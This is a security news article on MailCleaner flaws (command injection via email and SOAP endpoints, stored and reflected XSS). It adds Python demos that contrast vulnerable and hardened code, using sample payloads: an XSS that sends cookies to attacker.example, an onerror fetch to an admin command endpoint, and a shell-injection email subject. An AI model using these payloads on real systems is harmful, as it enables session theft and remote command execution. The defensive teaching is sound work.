Critical MailCleaner Vulnerabilities Let Attackers Execute Commands


Critical vulnerabilities in MailCleaner versions before 2023.03.14 allow remote attackers to take complete control of the appliance. The entry points are malicious emails, administrator interaction with attacker-controlled sites or links, and exposed SOAP endpoints; a successful attack compromises the confidentiality and integrity of the MailCleaner system and of every email it processes.

Additionally, authenticated attackers with administrative privileges can extend their control by executing arbitrary commands or manipulating files on the system. The risk is especially significant in cluster deployments, where a single compromised machine gives an attacker control of all cluster members.


A critical OS command injection vulnerability in MailCleaner's email-cleaning cron job allows a remote attacker to gain root access with a single crafted email: data taken from the message reaches a shell command without proper escaping, enabling arbitrary command execution and complete system compromise.

Once in control of the MailCleaner appliance, attackers can intercept and manipulate every email the system processes.


An unauthenticated attacker can exploit a stored cross-site scripting (XSS) vulnerability in the admin dashboard simply by sending a malicious email: the injected JavaScript runs in an administrator's browser when the message is displayed, allowing session hijacking, data theft, or unauthorized actions with administrator privileges.

This XSS can be chained with the other vulnerabilities to reach OS command injection, for example by driving the administrator's browser to the vulnerable administrator endpoints described below, which significantly amplifies the attack potential.

The MailCleaner administrator dashboard.


A critical command injection vulnerability in administrator endpoints allows attackers to gain root access. Exploitation requires either compromised administrator credentials or social engineering that tricks an administrator into visiting a malicious URL; once triggered, it grants complete system compromise.

Successful execution of XSS payload sent to monitor logs and view endpoint

Two further vulnerabilities in endpoints the report does not name allow attackers to inject malicious JavaScript via crafted links: when the victim clicks such a link, the script executes in their browser session, enabling session hijacking, data theft, or unauthorized actions under the victim's identity.

This is a reflected cross-site scripting (XSS) vulnerability: user-supplied data is echoed back in the response without being sanitized or encoded for the HTML context it lands in.
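Both the stored XSS delivered by email (above) and the reflected XSS triggered by a crafted link share one root cause, untrusted data written into HTML without output encoding, and one fix. The following is an added Python example, not MailCleaner's code and not taken from the report: the quarantine-row and error-page renderers, the `/admin/run?cmd=` endpoint that the stored payload calls, and both payloads are assumptions constructed to illustrate the pattern. The hypothetical payload also shows how a stored XSS in the admin session can be chained into a request against an administrator endpoint.

```python
import html
from html.parser import HTMLParser

# Constructed samples (not from the MailCleaner advisory).
# STORED_SUBJECT is an email Subject header that a sender controls and that the
# dashboard later renders; the /admin/run?cmd= endpoint it targets is a
# hypothetical command-injection endpoint used to show the XSS-to-RCE chain.
STORED_SUBJECT = '<img src=x onerror="fetch(\'/admin/run?cmd=id\')">'
# REFLECTED_PARAM is a query-string value that an error page echoes back.
REFLECTED_PARAM = (
    '"><script>document.location="https://attacker.example/?c="'
    "+document.cookie</script>"
)


def render_quarantine_row_vulnerable(subject: str) -> str:
    """Stored XSS: the subject is concatenated into the dashboard HTML untouched,
    so whatever JavaScript the sender planted runs when an admin views the list."""
    return f"<tr><td class='subject'>{subject}</td></tr>"


def render_error_vulnerable(param: str) -> str:
    """Reflected XSS: a request parameter is echoed inside an attribute value
    without encoding; a crafted link closes the attribute and injects a script."""
    return f'<input name="q" value="{param}">'


def render_quarantine_row_hardened(subject: str) -> str:
    """Fix: HTML-encode at the point of output. quote=True also encodes ' and "
    so the value cannot break out of an attribute either."""
    return f"<tr><td class='subject'>{html.escape(subject, quote=True)}</td></tr>"


def render_error_hardened(param: str) -> str:
    return f'<input name="q" value="{html.escape(param, quote=True)}">'


class _TagCollector(HTMLParser):
    """Collects start tags and inline event-handler attribute names."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.handlers: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def injected_elements(markup: str, allowed: set[str]) -> list[str]:
    """Parse rendered HTML the way a browser would and report every element the
    template did not intend plus every inline event handler. An empty list means
    the untrusted value stayed inert text."""
    parser = _TagCollector()
    parser.feed(markup)
    return [t for t in parser.tags if t not in allowed] + parser.handlers


if __name__ == "__main__":
    print(injected_elements(render_quarantine_row_vulnerable(STORED_SUBJECT), {"tr", "td"}))
    print(injected_elements(render_quarantine_row_hardened(STORED_SUBJECT), {"tr", "td"}))
    print(injected_elements(render_error_vulnerable(REFLECTED_PARAM), {"input"}))
    print(injected_elements(render_error_hardened(REFLECTED_PARAM), {"input"}))
```

Running the block shows the vulnerable renderers producing a stray `img` element with an `onerror` handler and a stray `script` element, while the hardened renderers produce only the template's own tags. Encoding is context-specific: `html.escape` is right for element text and quoted attributes, but a value dropped into a JavaScript block or a URL needs the encoder for that context instead.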


Exploiting the command injection vulnerability in the getStats endpoint.

Vulnerabilities in unauthenticated SOAP endpoints allow remote attackers to execute arbitrary commands with root privileges: user-supplied data is passed into OS commands with insufficient validation, so an attacker can append commands of their own.
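The cron-job flaw triggered by email and the SOAP endpoint flaw described here are both OS command injection: untrusted input is interpolated into a command string that a shell interprets. The following added Python example (not MailCleaner's code, whose internals the report does not show) demonstrates the pattern and its fix. The header name, the logging command and the payload are assumptions; the payload only echoes a marker so it is harmless to run.

```python
import subprocess

# Constructed sample inbound message (not a real MailCleaner message).
# The Subject header carries a shell payload: the double quote closes the
# argument the code meant to pass, and the rest is run as further commands.
SAMPLE_HEADERS = {
    "From": "sender@example.net",
    "Subject": 'Invoice"; echo INJECTED; echo "',
}

# Characters that never belong in a value that is about to reach /bin/sh.
SHELL_META = set(';|&$`<>(){}\n\r\\"\'')


def log_subject_vulnerable(headers: dict) -> str:
    """Vulnerable pattern: format untrusted header text into a shell string.

    With shell=True the string is handed to /bin/sh -c, so the closing quote in
    the payload ends the intended argument and the shell runs what follows.
    In a cron job running as root that is root code execution from one email.
    Returns the shell's stdout so the effect is visible.
    """
    cmd = f'echo "{headers["Subject"]}"'
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout


def log_subject_hardened(headers: dict) -> str:
    """Hardened pattern: pass the value as one argv element with no shell.

    The subject reaches echo as a single argument, metacharacters included,
    and nothing in it is interpreted as syntax.
    """
    result = subprocess.run(
        ["echo", headers["Subject"]], capture_output=True, text=True
    )
    return result.stdout


def has_shell_metacharacters(value: str) -> bool:
    """Defence in depth: flag header values that would be dangerous if some
    other code path (a SOAP handler, a Perl system() call) still builds a
    shell command from them. Use this to reject or log, not as the only fix."""
    return any(ch in SHELL_META for ch in value)


if __name__ == "__main__":
    print("vulnerable:", repr(log_subject_vulnerable(SAMPLE_HEADERS)))
    print("hardened:  ", repr(log_subject_hardened(SAMPLE_HEADERS)))
    print("flagged:   ", has_shell_metacharacters(SAMPLE_HEADERS["Subject"]))
```

The vulnerable function prints the marker on its own line, proving a second command ran; the hardened function prints the subject verbatim, quotes and semicolons included. The same argv discipline applies to a SOAP handler that passes request fields to a system utility: build an argument list, never a string, and validate fields against an allowlist before they get anywhere near a process call.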

According to modzero, in clustered environments compromising a single member grants full access to all machines, which escalates the compromise across the whole cluster.

In summary, multiple critical and high-severity vulnerabilities were identified in MailCleaner. An unauthenticated attacker can execute arbitrary commands on the system through email (CVE-2024-3191), inject malicious scripts (CVE-2024-3192, CVE-2024-3194), or trick a logged-in user into performing unintended actions (CVE-2024-3193).

Authenticated users can gain unauthorized access to files (CVE-2024-3195) and execute arbitrary commands on the system through local SOAP endpoints (CVE-2024-3196).
